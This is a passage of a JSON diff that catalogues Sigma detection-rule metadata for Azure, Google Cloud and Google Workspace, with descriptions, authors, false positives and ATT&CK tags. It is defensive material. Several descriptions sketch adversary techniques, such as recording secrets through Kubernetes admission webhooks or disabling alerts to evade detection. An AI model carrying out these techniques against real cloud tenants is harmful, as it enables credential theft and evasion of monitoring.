+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/08/09",
+ "falsepositive": [
+ "Administrator disabling PIM alerts as an active choice."
+ ],
+ "filename": "azure_pim_alerts_disabled.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1484"
+ ]
+ },
+ "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd",
+ "value": "PIM Alert Setting Changes To Disabled"
+ },
+ {
+ "description": "Detects when changes are made to PIM roles",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/08/09",
+ "falsepositive": [
+ "Legit administrative PIM setting configuration changes"
+ ],
+ "filename": "azure_pim_change_settings.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.defense_evasion",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743",
+ "value": "Changes To PIM Settings"
+ },
+ {
+ "description": "Detects when a user is added to a privileged role.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/08/06",
+ "falsepositive": [
+ "Legtimate administrator actions of adding members from a role"
+ ],
+ "filename": "azure_priviledged_role_assignment_add.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
+ },
+ "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5",
+ "value": "User Added To Privilege Role"
+ },
+ {
+ "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/08/05",
+ "falsepositive": [
+ "Legtimate administrator actions of removing members from a role"
+ ],
+ "filename": "azure_priviledged_role_assignment_bulk_change.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
+ },
+ "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21",
+ "value": "Bulk Deletion Changes To Privileged Account Permissions"
+ },
+ {
+ "description": "Detects when a new admin is created.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton",
+ "creation_date": "2022/08/11",
+ "falsepositive": [
+ "A legitimate new admin account being created"
+ ],
+ "filename": "azure_privileged_account_creation.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947",
+ "value": "Privileged Account Creation"
+ },
+ {
+ "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.",
+ "meta": {
+ "author": "sawwinnnaung",
+ "creation_date": "2020/05/07",
+ "falsepositive": [
+ "Valid change"
+ ],
+ "filename": "azure_rare_operations.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml"
+ ],
+ "tags": [
+ "attack.t1003"
+ ]
+ },
+ "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488",
+ "value": "Rare Subscription-level Operations In Azure"
+ },
+ {
+ "description": "Identifies when a service principal is created in Azure.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/09/02",
+ "falsepositive": [
+ "Service principal being created may be performed by a system administrator.",
+ "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_service_principal_created.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3",
+ "value": "Azure Service Principal Created"
+ },
+ {
+ "description": "Identifies when a service principal was removed in Azure.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/09/03",
+ "falsepositive": [
+ "Service principal being removed may be performed by a system administrator.",
+ "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_service_principal_removed.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08",
+ "value": "Azure Service Principal Removed"
+ },
+ {
+ "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/11/26",
+ "falsepositive": [
+ "If this was approved by System Administrator."
+ ],
+ "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95",
+ "value": "Azure Subscription Permission Elevation Via ActivityLogs"
+ },
+ {
+ "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/11/26",
+ "falsepositive": [
+ "If this was approved by System Administrator."
+ ],
+ "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d",
+ "value": "Azure Subscription Permission Elevation Via AuditLogs"
+ },
+ {
+ "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.",
+ "meta": {
+ "author": "Austin Songer",
+ "creation_date": "2021/08/16",
+ "falsepositive": [
+ "Suppression Rule being created may be performed by a system administrator.",
+ "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_suppression_rule_created.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401",
+ "value": "Azure Suppression Rule Created"
+ },
+ {
+ "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'",
+ "creation_date": "2022/08/10",
+ "falsepositive": [
+ "Administrator adding a legitmate temporary access pass"
+ ],
+ "filename": "azure_tap_added.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.defense_evasion",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce",
+ "value": "Temporary Access Pass Added To An Account"
+ },
+ {
+ "description": "Detects when there is a interruption in the authentication process.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/11/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "azure_unusual_authentication_interruption.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "8366030e-7216-476b-9927-271d79f13cf3",
+ "value": "Azure Unusual Authentication Interruption"
+ },
+ {
+ "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.",
+ "meta": {
+ "author": "MikeDuddington, '@dudders1'",
+ "creation_date": "2022/06/30",
+ "falsepositive": [
+ "If this was approved by System Administrator."
+ ],
+ "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml"
+ ],
+ "tags": [
+ "attack.t1078"
+ ]
+ },
+ "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9",
+ "value": "Users Authenticating To Other Azure AD Tenants"
+ },
+ {
+ "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n",
+ "meta": {
+ "author": "AlertIQ",
+ "creation_date": "2021/10/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "azure_user_login_blocked_by_conditional_access.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1110"
+ ]
+ },
+ "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf",
+ "value": "User Access Blocked by Azure Conditional Access"
+ },
+ {
+ "description": "Detect when a user has reset their password in Azure AD",
+ "meta": {
+ "author": "YochanaHenderson, '@Yochana-H'",
+ "creation_date": "2022/08/03",
+ "falsepositive": [
+ "If this was approved by System Administrator or confirmed user action."
+ ],
+ "filename": "azure_user_password_change.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml"
+ ],
+ "tags": [
+ "attack.t1078"
+ ]
+ },
+ "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa",
+ "value": "Password Reset By User Account"
+ },
+ {
+ "description": "Identifies when a Virtual Network is modified or deleted in Azure.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/08",
+ "falsepositive": [
+ "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_virtual_network_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f",
+ "value": "Azure Virtual Network Modified or Deleted"
+ },
+ {
+ "description": "Identifies when a VPN connection is modified or deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/08",
+ "falsepositive": [
+ "VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "azure_vpn_connection_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3",
+ "value": "Azure VPN Connection Modified or Deleted"
+ },
+ {
+ "description": "Detects when storage bucket is enumerated in Google Cloud.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/14",
+ "falsepositive": [
+ "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ], + "filename": "gcp_bucket_enumeration.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", + "value": "Google Cloud Storage Buckets Enumeration" + }, + { + "description": "Detects when storage bucket is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_bucket_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", + "value": "Google Cloud Storage Buckets Modified or Deleted" + }, + { + "description": "Identifies when sensitive information is re-identified in google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dlp_re_identifies_sensitive_information.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", + "value": "Google Cloud Re-identifies Sensitive Information" + }, + { + "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dns/docs/reference/v1/managedZones", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", + "value": "Google Cloud DNS Zone Modified or Deleted" + }, + { + "description": 
"Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", + "Exceptions can be added to this rule to filter expected behavior." + ], + "filename": "gcp_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", + "value": "Google Cloud Firewall Modified or Deleted" + }, + { + "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Full Network Packet Capture may be done by a system or network administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_full_network_traffic_packet_capture.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074" + ] + }, + "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", + "value": "Google Full Network Traffic Packet Capture" + }, + { + "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", + "value": "Google Cloud Kubernetes Admission Controller" + }, + { + "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", + "value": "Google Cloud Kubernetes CronJob" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_rolebinding.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1267", + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", + "value": "Google Cloud Kubernetes RoleBinding" + }, + { + "description": "Identifies when the Secrets are Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "value": "Google Cloud Kubernetes Secrets Modified or Deleted" + }, + { + "description": "Identifies when a service account is disabled or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_disabled_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", + "value": "Google Cloud Service Account Disabled or Deleted" + }, + { + "description": "Identifies when a service account is modified in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being modified may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", + "value": "Google Cloud Service Account Modified" + }, + { + "description": "Detect when a Cloud SQL DB has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/15", + "falsepositive": [ + "SQL Database being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "gcp_sql_database_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", + "value": "Google Cloud SQL Database Modified or Deleted" + }, + { + "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "VPN Tunnel being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", + "value": "Google Cloud VPN Tunnel Modified or Deleted" + }, + { + "description": "Detects when an an application is removed from Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "Application being removed may be performed by a System Administrator." 
